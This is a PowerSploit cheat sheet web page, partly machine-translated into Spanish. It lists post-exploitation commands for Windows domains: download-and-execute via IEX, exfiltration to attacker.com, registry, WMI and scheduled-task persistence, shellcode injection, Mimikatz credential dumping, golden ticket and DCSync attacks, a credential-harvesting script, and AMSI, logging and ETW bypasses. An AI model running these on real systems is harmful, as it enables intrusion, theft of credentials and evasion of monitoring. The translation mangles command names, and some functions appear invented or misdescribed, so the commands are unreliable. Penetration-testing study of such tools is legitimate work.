PowerSploit hoja de trucos

📋 Copy All comandos 📄 Generate PDF

Overview

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules: CodeExecution, ScriptModification, persistencia, AntivirusBypass, exfiltración, Mayhem, Privesc, and Recon. Each module contains several functions that provide various capabilities for post-exploitation activities.

⚠️ Warning: Only use PowerSploit in environments you own or have explicit permission to test. Unauthorized use may violate terms of servicio or local laws.

instalación

Download from GitHub

# Download PowerSploit
Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"

# Extract archive
Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"

# Navigate to PowerSploit directory
cd C:\Tools\PowerSploit-master\

Git Clone

# Clone repository
git clone https://github.com/PowerShellMafia/PowerSploit.git

# Navigate to directory
cd PowerSploit

Impuerto Modules

# Impuerto all modules
Impuerto-Module .\PowerSploit.psd1

# Impuerto specific modules
Impuerto-Module .\Recon\Recon.psd1
Impuerto-Module .\Privesc\PowerUp.ps1
Impuerto-Module .\exfiltración\exfiltración.psd1
Impuerto-Module .\persistencia\persistencia.psd1

# Impuerto from URL (in-memory)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

Bypass Execution Policy

# Bypass execution policy for current sesión
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser

# Run with bypass
powershell -ExecutionPolicy Bypass -File script.ps1

# Impuerto with bypass
powershell -ExecutionPolicy Bypass -comando "Impuerto-Module .\PowerSploit.psd1"

Recon Module

PowerView Functions

# Impuerto PowerView
Impuerto-Module .\Recon\PowerView.ps1

# Get domain information
Get-Domain
Get-DomainController
Get-DomainPolicy

# Get forest information
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog

# Domain trust enumeración
Get-DomainTrust
Get-ForestTrust
Get-DomainTrustMapping

# User enumeración
Get-DomainUser
Get-DomainUser -Identity administrator
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user))"
Get-DomainUser -Properties samaccountname,Descripción

# Group enumeración
Get-DomainGroup
Get-DomainGroup -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroup -AdminCount

# Computer enumeración
Get-DomainComputer
Get-DomainComputer -Operating System "*Server*"
Get-DomainComputer -Ping
Get-DomainComputer -Properties name,operatingsystem,servicioprincipalname

Advanced PowerView Queries

# Find users with SPN (Kerberoastable)
Get-DomainUser -SPN

# Find computers with unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Find users with constrained delegation
Get-DomainUser -TrustedToAuth

# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired

# Find users with contraseñas not required
Get-DomainUser -contraseñaNotRequired

# Find users with contraseñas that don't expire
Get-DomainUser -contraseñaNeverExpires

# Find privileged users
Get-DomainUser -AdminCount
Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse

# Find shares
Find-DomainShare
Find-DomainShare -CheckShareAccess

# Find interesting files
Find-InterestingDomainShareFile
Find-InterestingDomainShareFile -Include *.doc,*.docx,*.xls,*.xlsx,*.ppt,*.pptx

sesión and Local Admin enumeración

# Find local admin access
Find-LocalAdminAccess
Find-LocalAdminAccess -ComputerName "objetivo-computer"

# Find domain admin sesións
Find-DomainUserLocation
Find-DomainUserLocation -UserIdentity "administrator"

# Get logged on users
Get-NetLoggedon -ComputerName "objetivo-computer"
Get-Netsesión -ComputerName "objetivo-computer"

# Get local groups
Get-NetLocalGroup -ComputerName "objetivo-computer"
Get-NetLocalGroupMember -ComputerName "objetivo-computer" -GroupName "Administrators"

# proceso enumeración
Get-Netproceso -ComputerName "objetivo-computer"

ACL and Permissions

# Get ACLs for objects
Get-ObjectAcl -Identity "Domain Admins"
Get-ObjectAcl -Identity "administrator" -ResolveGUIDs

# Find interesting ACLs
Find-InterestingDomainAcl
Find-InterestingDomainAcl -ResolveGUIDs

# Get path ACLs
Get-PathAcl -Path "\\server\share"

# Add ACL
Add-ObjectAcl -objetivoIdentity "objetivo-user" -PrincipalIdentity "attacker-user" -Rights DCSync

Privesc Module (PowerUp)

Basic escalada de privilegios

# Impuerto PowerUp
Impuerto-Module .\Privesc\PowerUp.ps1

# Run all escalada de privilegios checks
Invoke-AllChecks

# Run specific checks
Invoke-servicioAbuse
Invoke-PrivescAudit

# Check for unquoted servicio paths
Get-servicioUnquoted

# Check for modifiable servicios
Get-Modifiableservicio

# Check for modifiable servicio binaries
Get-ModifiableservicioFile

# Check for always install elevated
Get-RegistryAlwaysInstallElevated

# Check for auto logon credenciales
Get-RegistryAutoLogon

# Check for modifiable scheduled tasks
Get-ModifiableScheduledTaskFile

servicio exploitation

# Abuse unquoted servicio paths
Write-servicioBinary -Name "Vulnservicio" -Path "C:\Program Files\Vuln servicio\servicio.exe"

# Abuse modifiable servicios
Invoke-servicioAbuse -Name "Vulnservicio" -comando "net user puerta trasera contraseña123 /add"

# Install servicio
Install-servicioBinary -Name "puerta traseraservicio" -Path "C:\Windows\Temp\puerta trasera.exe"

# Restore servicio
Restore-servicioBinary -Name "Vulnservicio"

DLL Hijacking

# Find DLL hijacking oppuertounities
Find-procesoDLLHijack
Find-PathDLLHijack

# Write hijack DLL
Write-HijackDll -DllPath "C:\Windows\System32\wlbsctrl.dll" -comando "net user puerta trasera contraseña123 /add"

Registry exploitation

# Check for auto-elevate binaries
Get-Applicationhost

# Check for modifiable registry autoruns
Get-ModifiableRegistryAutoRun

# Check for Unattend files
Get-UnattendedInstallFile

# Check for web config files
Get-Webconfig

# Check for cached GPP contraseñas
Get-CachedGPPcontraseña

persistencia Module

Registry persistencia

# Impuerto persistencia module
Impuerto-Module .\persistencia\persistencia.psd1

# Add registry persistencia
Add-persistencia -Method Registry -clave "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -Value "puerta trasera" -payloadPath "C:\Windows\Temp\puerta trasera.exe"

# Add WMI persistencia
Add-persistencia -Method WMI -EventName "procesoStart" -payloadPath "C:\Windows\Temp\puerta trasera.exe"

# Add scheduled task persistencia
Add-persistencia -Method ScheduledTask -TaskName "SystemUpdate" -payloadPath "C:\Windows\Temp\puerta trasera.exe" -Trigger "Daily"

WMI persistencia

# Install WMI puerta trasera
Install-WMIpuerta trasera -payloadPath "C:\Windows\Temp\puerta trasera.exe"

# Get WMI puerta trasera
Get-WMIpuerta trasera

# Remove WMI puerta trasera
Remove-WMIpuerta trasera

User Hunting

# Add user hunter
Add-UserHunter -nombre de usuario "administrator" -payloadPath "C:\Windows\Temp\puerta trasera.exe"

# Get user hunter
Get-UserHunter

# Remove user hunter
Remove-UserHunter

CodeExecution Module

DLL Injection

# Impuerto CodeExecution module
Impuerto-Module .\CodeExecution\CodeExecution.psd1

# Invoke DLL injection
Invoke-DllInjection -procesoID 1234 -Dll "C:\Windows\Temp\payload.dll"

# Invoke reflective PE injection
Invoke-ReflectivePEInjection -PEPath "C:\Windows\Temp\payload.exe" -procesoID 1234

# Invoke shellcode injection
Invoke-Shellcode -Shellcode $shellcode -procesoID 1234

Memory Execution

# Execute PE in memory
Invoke-ReflectivePEInjection -PEBytes $PEBytes

# Execute shellcode
$shellcode = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8...)
Invoke-Shellcode -Shellcode $shellcode

# Invoke mimikatz in memory
Invoke-Mimikatz
Invoke-Mimikatz -comando "sekurlsa::logoncontraseñas"

exfiltración Module

Data exfiltración

# Impuerto exfiltración module
Impuerto-Module .\exfiltración\exfiltración.psd1

# Exfiltrate via DNS
Invoke-DNSexfiltración -Data "sensitive data" -Domain "attacker.com"

# Exfiltrate via ICMP
Invoke-ICMPexfiltración -Data "sensitive data" -objetivo "attacker-ip"

# Exfiltrate via HTTP
Invoke-HTTPexfiltración -Data "sensitive data" -URL "http://attacker.com/upload"

# Get clipboard contents
Get-ClipboardContents

# Get clavestrokes
Get-clavestrokes -LogPath "C:\Windows\Temp\clavelog.txt"

# Take screenshots
Get-TimedScreenshot -Path "C:\Windows\Temp\screenshots" -Interval 30

Credential Harvesting

# Get stored credenciales
Get-VaultCredential
Get-LSASecret

# Dump SAM database
Get-SAMhashes

# Get cached domain credenciales
Get-CachedRDPconexión

# Invoke credential prompt
Invoke-CredentialInjection

AntivirusBypass Module

AV Evasion

# Impuerto AntivirusBypass module
Impuerto-Module .\AntivirusBypass\AntivirusBypass.psd1

# Find AV procesoes
Find-AVfirma

# Disable Windows Defender
Disable-WindowsDefender

# Bypass AMSI
Invoke-AMSIBypass

# Obfuscate script
Out-ObfuscatedAst -ScriptPath "script.ps1"

ScriptModification Module

Script Obfuscation

# Impuerto ScriptModification module
Impuerto-Module .\ScriptModification\ScriptModification.psd1

# Obfuscate PowerShell script
Out-Encodedcomando -ScriptBlock \\\\{Get-proceso\\\\}

# Compress and encode script
Out-CompressedDll -ScriptPath "script.ps1"

# Minify script
Out-MinimizedScript -ScriptPath "script.ps1"

Mayhem Module

System Disruption

# Impuerto Mayhem module
Impuerto-Module .\Mayhem\Mayhem.psd1

# Set wallpaper
Set-Wallpaper -ImagePath "C:\Windows\Temp\image.jpg"

# Set critical proceso
Set-Criticalproceso -procesoName "notepad"

# Add machine account to domain
Add-MachineAccountQuota -MachineAccount "FAKE01" -contraseña "contraseña123"

Advanced Techniques

Kerberoasting

# Find Kerberoastable users
Get-DomainUser -SPN|Select-Object samaccountname,servicioprincipalname

# Request servicio tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.tokens.KerberosRequestorSecuritytoken -ArgumentList "HTTP/web.domain.com"

# Expuerto tickets for cracking
Invoke-Mimikatz -comando "kerberos::list /expuerto"

ASREPRoasting

# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired|Select-Object samaccountname

# Request AS-REP for user without pre-auth
Get-ASREPhash -nombre de usuario "vulnerable-user" -Domain "domain.com"

Golden Ticket Attack

# Get domain SID
Get-DomainSID

# Create golden ticket (requires krbtgt hash)
Invoke-Mimikatz -comando "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi"

# Impuerto golden ticket
Invoke-Mimikatz -comando "kerberos::ptt golden.kirbi"

Silver Ticket Attack

# Create silver ticket (requires servicio account hash)
Invoke-Mimikatz -comando "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /objetivo:server.domain.com /servicio:cifs /rc4:hash /ticket:silver.kirbi"

# Impuerto silver ticket
Invoke-Mimikatz -comando "kerberos::ptt silver.kirbi"

DCSync Attack

# Perform DCSync (requires replication rights)
Invoke-Mimikatz -comando "lsadump::dcsync /domain:domain.com /user:krbtgt"
Invoke-Mimikatz -comando "lsadump::dcsync /domain:domain.com /user:administrator"

# DCSync all users
Invoke-Mimikatz -comando "lsadump::dcsync /domain:domain.com /all"

Automation Scripts

Domain enumeración Script

#!/usr/bin/env powershell
# PowerSploit Domain enumeración Script

param(
    [string]$Domain = $env:USERDNSDOMAIN,
    [string]$OutputDir = "C:\temp\enum"
)

# Create output directory
if (!(Test-Path $OutputDir)) \\\\{
    New-Item -ItemType Directory -Path $OutputDir -Force
\\\\}

# Impuerto PowerView
Impuerto-Module .\Recon\PowerView.ps1

Write-host "[+] Starting domain enumeración for: $Domain"

try \\\\{
    # Domain information
    Write-host "[+] Collecting domain information..."
    Get-Domain -Domain $Domain|Out-File "$OutputDir\domain_info.txt"
    Get-DomainController -Domain $Domain|Out-File "$OutputDir\domain_controllers.txt"
    Get-DomainPolicy -Domain $Domain|Out-File "$OutputDir\domain_policy.txt"

    # Users
    Write-host "[+] Enumerating users..."
    Get-DomainUser -Domain $Domain|Out-File "$OutputDir\users.txt"
    Get-DomainUser -Domain $Domain -AdminCount|Out-File "$OutputDir\privileged_users.txt"
    Get-DomainUser -Domain $Domain -SPN|Out-File "$OutputDir\kerberoastable_users.txt"
    Get-DomainUser -Domain $Domain -PreauthNotRequired|Out-File "$OutputDir\asreproastable_users.txt"

    # Groups
    Write-host "[+] Enumerating groups..."
    Get-DomainGroup -Domain $Domain|Out-File "$OutputDir\groups.txt"
    Get-DomainGroupMember -Identity "Domain Admins" -Domain $Domain|Out-File "$OutputDir\domain_admins.txt"
    Get-DomainGroupMember -Identity "Enterprise Admins" -Domain $Domain|Out-File "$OutputDir\enterprise_admins.txt"

    # Computers
    Write-host "[+] Enumerating computers..."
    Get-DomainComputer -Domain $Domain|Out-File "$OutputDir\computers.txt"
    Get-DomainComputer -Domain $Domain -UnconstrainedDelegation|Out-File "$OutputDir\unconstrained_delegation.txt"

    # Trusts
    Write-host "[+] Enumerating trusts..."
    Get-DomainTrust -Domain $Domain|Out-File "$OutputDir\domain_trusts.txt"
    Get-ForestTrust|Out-File "$OutputDir\forest_trusts.txt"

    # Shares
    Write-host "[+] Finding shares..."
    Find-DomainShare -Domain $Domain|Out-File "$OutputDir\shares.txt"

    Write-host "[+] enumeración completed. Results saved to: $OutputDir"

\\\\} catch \\\\{
    Write-Error "[-] enumeración failed: $($_.Exception.Message)"
\\\\}

escalada de privilegios Check Script

#!/usr/bin/env powershell
# PowerSploit escalada de privilegios Check

param(
    [string]$OutputFile = "C:\temp\privesc_results.txt"
)

# Impuerto PowerUp
Impuerto-Module .\Privesc\PowerUp.ps1

Write-host "[+] Starting escalada de privilegios checks..."

try \\\\{
    # Run all checks and save to file
    Invoke-AllChecks|Tee-Object -FilePath $OutputFile

    Write-host "[+] escalada de privilegios checks completed"
    Write-host "[+] Results saved to: $OutputFile"

    # Check for immediate wins
    $results = Get-Content $OutputFile

    if ($results -match "Unquoted servicio Path") \\\\{
        Write-host "[!] FOUND: Unquoted servicio paths - potential escalada de privilegios!"
    \\\\}

    if ($results -match "Modifiable servicio") \\\\{
        Write-host "[!] FOUND: Modifiable servicios - potential escalada de privilegios!"
    \\\\}

    if ($results -match "AlwaysInstallElevated") \\\\{
        Write-host "[!] FOUND: AlwaysInstallElevated enabled - potential escalada de privilegios!"
    \\\\}

\\\\} catch \\\\{
    Write-Error "[-] escalada de privilegios checks failed: $($_.Exception.Message)"
\\\\}

Credential Harvesting Script

#!/usr/bin/env powershell
# PowerSploit Credential Harvesting Script

param(
    [string]$OutputDir = "C:\temp\creds"
)

# Create output directory
if (!(Test-Path $OutputDir)) \\\\{
    New-Item -ItemType Directory -Path $OutputDir -Force
\\\\}

# Impuerto modules
Impuerto-Module .\exfiltración\exfiltración.psd1
Impuerto-Module .\CodeExecution\CodeExecution.psd1

Write-host "[+] Starting credential harvesting..."

try \\\\{
    # Mimikatz - dump credenciales
    Write-host "[+] Running Mimikatz..."
    Invoke-Mimikatz -comando "sekurlsa::logoncontraseñas"|Out-File "$OutputDir\logoncontraseñas.txt"
    Invoke-Mimikatz -comando "sekurlsa::wdigest"|Out-File "$OutputDir\wdigest.txt"
    Invoke-Mimikatz -comando "sekurlsa::kerberos"|Out-File "$OutputDir\kerberos.txt"
    Invoke-Mimikatz -comando "sekurlsa::tspkg"|Out-File "$OutputDir\tspkg.txt"

    # Registry secrets
    Write-host "[+] Extracting registry secrets..."
    Get-LSASecret|Out-File "$OutputDir\lsa_secrets.txt"
    Get-CachedGPPcontraseña|Out-File "$OutputDir\gpp_contraseñas.txt"

    # Vault credenciales
    Write-host "[+] Extracting vault credenciales..."
    Get-VaultCredential|Out-File "$OutputDir\vault_creds.txt"

    # Browser credenciales
    Write-host "[+] Extracting browser credenciales..."
    Get-ChromeDump|Out-File "$OutputDir\chrome_creds.txt"
    Get-FirefoxDump|Out-File "$OutputDir\firefox_creds.txt"

    Write-host "[+] Credential harvesting completed"
    Write-host "[+] Results saved to: $OutputDir"

\\\\} catch \\\\{
    Write-Error "[-] Credential harvesting failed: $($_.Exception.Message)"
\\\\}

Evasion Techniques

AMSI Bypass

# Method 1: Reflection
$a = [Ref].Assembly.GetTypes()
| $a | ForEach-Object \\\\{$_.GetMethods() | ForEach-Object \\\\{if($_.Name -like "*AmsiInitialize*") \\\\{$_.Invoke($null, @($null, 0))\\\\}\\\\}\\\\} |

# Method 2: Memory patching
$Win32 = @"
using System;
using System.Runtime.Interopservicios;
public class Win32 \\\\{
    [DllImpuerto("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImpuerto("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImpuerto("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
\\\\}
"@

Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.Interopservicios.Marshal]::Copy($Patch, 0, $Address, 6)

PowerShell Logging Bypass

# Disable PowerShell logging
$GPO = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static')
$GPO.SetValue($null, @\\\\{\\\\})

# Disable script block logging
$settings = [System.Management.Automation.Utils]::GetGroupPolicySettings()
$settings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$settings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0

ETW Bypass

# Disable ETW
$Provider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $Provider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0)

Integration ejemplos

Cobalt Strike Integration

# PowerView integration with Cobalt Strike
beacon> powershell-impuerto /path/to/PowerView.ps1
beacon> powershell Get-DomainUser -AdminCount
beacon> powershell Find-LocalAdminAccess

# PowerUp integration
beacon> powershell-impuerto /path/to/PowerUp.ps1
beacon> powershell Invoke-AllChecks

# Mimikatz integration
beacon> powershell Invoke-Mimikatz -comando "sekurlsa::logoncontraseñas"

Empire Integration

# Use PowerSploit modules in Empire
(Empire: agents) > usemodule powershell/situational_awareness/network/powerview/get_domain_user
(Empire: agents) > usemodule powershell/privesc/powerup/allchecks
(Empire: agents) > usemodule powershell/credenciales/mimikatz/logoncontraseñas

Metasploit Integration

# Use PowerSploit with Metasploit
meterpreter > load powershell
meterpreter > powershell_impuerto /path/to/PowerView.ps1
meterpreter > powershell_execute "Get-DomainUser -AdminCount"

# Post-exploitation modules
use post/windows/gather/enum_domain
use post/windows/escalate/getsystem
use post/windows/gather/credenciales/credential_collector

solución de problemas

Execution Policy Issues

# Check current execution policy
Get-ExecutionPolicy

# Set execution policy
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

# Bypass for single comando
powershell -ExecutionPolicy Bypass -comando "Impuerto-Module .\PowerSploit.psd1"

# Use encoded comandos
$comando = "Impuerto-Module .\PowerSploit.psd1"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($comando)
$encodedcomando = [Convert]::ToBase64String($bytes)
powershell -Encodedcomando $encodedcomando

AMSI Detection

# Test AMSI detection
'Invoke-Mimikatz'  # Should trigger AMSI

# Obfuscate strings
$cmd = 'Inv' + 'oke-Mim' + 'ikatz'
Invoke-Expression $cmd

# Use variables
$a = 'Invoke-'
$b = 'Mimikatz'
Invoke-Expression ($a + $b)

Module Impuerto Issues

# Force impuerto
Impuerto-Module .\PowerSploit.psd1 -Force

# Impuerto with full path
Impuerto-Module "C:\Tools\PowerSploit\PowerSploit.psd1"

# Check module path
$env:PSModulePath

# Add to module path
$env:PSModulePath += ";C:\Tools\PowerSploit"

Network Connectivity Issues

# Test network connectivity
Test-Netconexión -ComputerName "objetivo" -puerto 445

# Check firewall
Get-NetFirewallRule|Where-Object \\\\{$_.Enabled -eq "True"\\\\}

# Use alternative puertos
Get-DomainController -Server "dc.domain.com:389"

Resources

• Official PowerSploit Repository
• PowerSploit documentación
• PowerView hoja de trucos
• PowerUp documentación
• Active Directory Security
• PowerShell Empire
• BloodHound Integration

---

This hoja de trucos provides a comprehensive reference for using PowerSploit for Windows pruebas de penetración and post-exploitation. Always ensure you have proper autorización before using this tool in any environment.